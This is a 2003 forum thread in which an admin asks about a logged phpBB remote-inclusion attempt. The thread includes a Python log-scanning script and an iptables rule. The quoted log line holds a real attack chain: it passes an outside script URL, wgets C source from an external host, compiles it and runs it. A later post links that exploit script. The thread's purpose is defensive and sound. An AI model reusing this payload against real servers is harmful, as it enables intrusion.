Suspicious activity on the server

Discussion in 'General Discussion' started by simonlee, Nov 23, 2003.

  1. simonlee

    I've found this in the Apache access log:
    201.2.211.246 - - [23/Nov/2003:04:06:29 +1100] "GET /phpBB/templates/subSilver/shoutbox/expanded.php?conf=http://xfteam.net/cmd.txt&cmd=uname%20-a;cd%20/tmp;wget%20http://www10.brinkster.com/canalforbid/fedor.txt;mv?&cmd=uname%20-a;echo%20XFTEAM;cd%20/tmp;wget%20http://www10.brinkster.com/canalforbid/fedor.txt;mv fedor.txt fedor.c;gcc -o f fedor.c;./f HTTP/1.0" 400 375

    and a .c file in /tmp

    Fortunately, I've disabled the C compiler on the server.
    Was somebody trying to use holes in phpBB to hack into the server?
    Can somebody advise how to prevent such activities?
     
  2. markie

    What version of phpBB is this? I recently saw something like this on a Cobalt server where they did the same thing except it was done through a php pgm.
     
  3. simonlee

    phpBB 2.0.6, any advice?
     
  4. markie

    Are you sure about that? I know 2.0.4 was vulnerable to this and people were advised to upgrade. We told all our users to upgrade immediately. I would post this on their forums and find out if anyone else has reported this. I am not aware of a hole like this in version 2.0.6, at least we have not seen any security posts about this version. Please contact phpBB and find out if anyone else has reported this. If 2.0.6 is vuln then we have some major security issues on our servers as well due to the fact that we have a few hundred sites running it.
     
  5. simonlee

    Okay, I will go to the phpBB forum.
    Yes, I am sure, because the board comes with cPanel, and we have already upgraded our cPanel to the latest released version: 8.5.4-R7

    Thank you markie!
     
  6. markie

    Well, let us know what phpBB says about 2.0.6.
     
  7. RaveKnights

    Here's the script they had tried to use: http://www10.brinkster.com/canalforbid/fedor.txt

    Here are their IPs; you might want to REJECT them in iptables if you use it.

    66.70.10.0
    66.70.10.255

    66.70.10.0/24

    Quick iptables code to enter below:

    iptables -A INPUT -s 66.70.10.0/24 -j REJECT
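
A log check for the request shape shown in the first post (a URL passed as a parameter value, plus a chained shell command in another parameter), as an added example that is not part of the original thread. The function names, the tool word list and the sample lines are assumptions constructed for illustration; the parser tolerates the unencoded spaces that appear in that request line.

```python
import re
from urllib.parse import unquote_plus

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*)" (\d{3}) \S+$')
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.I)   # parameter value is a URL
SHELL_CHAIN = re.compile(r'[;|`]|\$\(')                   # command chaining
TOOL = re.compile(r'\b(?:wget|curl|gcc|cc|uname|chmod)\b', re.I)  # assumed word list

def request_target(request):
    """URI part of a request line, tolerating unencoded spaces inside it."""
    parts = request.split(" ")
    if len(parts) >= 3 and parts[-1].upper().startswith("HTTP/"):
        return " ".join(parts[1:-1])
    return " ".join(parts[1:])

def inspect(line):
    """Return None if the line is not CLF, else host, status and findings."""
    m = CLF.match(line.strip())
    if not m:
        return None
    host, request, status = m.groups()
    query = request_target(request).partition("?")[2]
    findings = []
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if REMOTE_VALUE.match(value):
            findings.append(("remote-url-param", name))
        if SHELL_CHAIN.search(value) and TOOL.search(value):
            findings.append(("shell-command-param", name))
    return {"host": host, "status": int(status), "findings": findings}

# Constructed sample lines (documentation addresses, .invalid hosts)
SAMPLE = [
    '192.0.2.10 - - [23/Nov/2003:04:01:02 +1100] '
    '"GET /phpBB/viewtopic.php?t=42&highlight=apache HTTP/1.0" 200 5120',
    '192.0.2.77 - - [23/Nov/2003:04:06:29 +1100] '
    '"GET /phpBB/x/expanded.php?conf=http://a.example.invalid/cmd.txt'
    '&cmd=uname%20-a;cd%20/tmp;wget%20http://b.example.invalid/f.txt;'
    'mv f.txt f.c;gcc -o f f.c;./f HTTP/1.0" 400 375',
]

def flagged(lines):
    """Parsed records that carry at least one finding."""
    records = (inspect(line) for line in lines)
    return [r for r in records if r and r["findings"]]

if __name__ == "__main__":
    for record in flagged(SAMPLE):
        print(record)
```

Both checks are heuristics: a legitimate redirect parameter that carries a URL is flagged too, so hits need review alongside the response status.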
     